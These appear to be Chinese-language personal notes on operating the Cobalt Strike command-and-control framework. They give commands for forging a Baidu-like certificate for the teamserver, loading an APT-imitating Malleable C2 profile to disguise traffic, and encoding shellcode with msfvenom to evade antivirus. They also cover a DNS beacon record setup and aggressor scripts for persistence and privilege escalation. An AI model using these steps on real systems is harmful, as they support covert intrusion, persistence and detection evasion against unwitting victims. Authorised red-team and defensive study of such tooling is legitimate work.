cobaltstrike 使用笔记

---

重置 teamserver 证书

修改 teamserver 文件

1. 修改监听端口
2. 修改证书信息
3. 删除历史遗留cobaltstrike.store

如下:

# 获取证书信息
openssl s_client -connect www.baidu.com:443 -showcerts
# 重新生成 cobaltstrike.store
keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=baidu.com, OU=service operation department, O='BeiJing Baidu Netcom Science Technology Co. Ltd', L=beijing, S=beijing, C=CN"

启动

cobalt strike 可以加载 C2 profile . 一个非常棒的功能，可以帮我们伪装流量、SSL加密通讯,值得一用！

cd /opt/cs/
git clone https://github.com/rsmudge/Malleable-C2-Profiles
# 请确保前面证书生成没有问题
# 用法: ./teamserver [external IP] [password] [/path/to/my.profile]

./teamserver 本机IP 连接密码 Malleable-C2-Profiles/APT/putter.profile
# 记一下SSL cert SHA,在使用cobaltstrike连接时请确保一致
# 每个teamserver只能加载一个C2 Profiles,如下需要多个 请启动多个teamserver
# 当本地client连接多个teamserver时，可以自由切换listen

shellcode 免杀

cat payloadx86.bin |msfvenom - -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f csharp

Beacon DNS

贼慢

domain.com
malwarec2       A       192.168.3.1
games           NS      malwarec2.domain.com
files           NS      malwarec2.domain.com

aggressor 脚本收集

• persistence
• Aggressor scripts
• Aggressor scripts for use with Cobalt Strike 3.0+
• cobalt strike 自启动脚本 RegKeyRun Bitsadmin SchTasks WMI
• ElevateKit
• Set Cobalt Strike Beacons to SMS you upon arrival.
• Cobalt Strike 3.0+的来自多个来源的脚本

引用

• Malleable C2 Profiles
• help malleable c2(c2编写文档)
• 随机化Malleable C2 Profile
• malleable command and control
• a brave new world malleable c2
• 我在东北大学网络防御竞赛(缅因大学活动)中的cobalt strike脚本
• Remote Weaponization of WSUS MITM
• 高级微信战术-课程和笔记
• 迁移基础架构
• 用于设置CobaltStrike重定向器的自动脚本(nginx反向代理，letsencrypt)
• BeaconTools
• Dissecting Veil-Evasion Powershell Payloads and Converting to a Bind Shell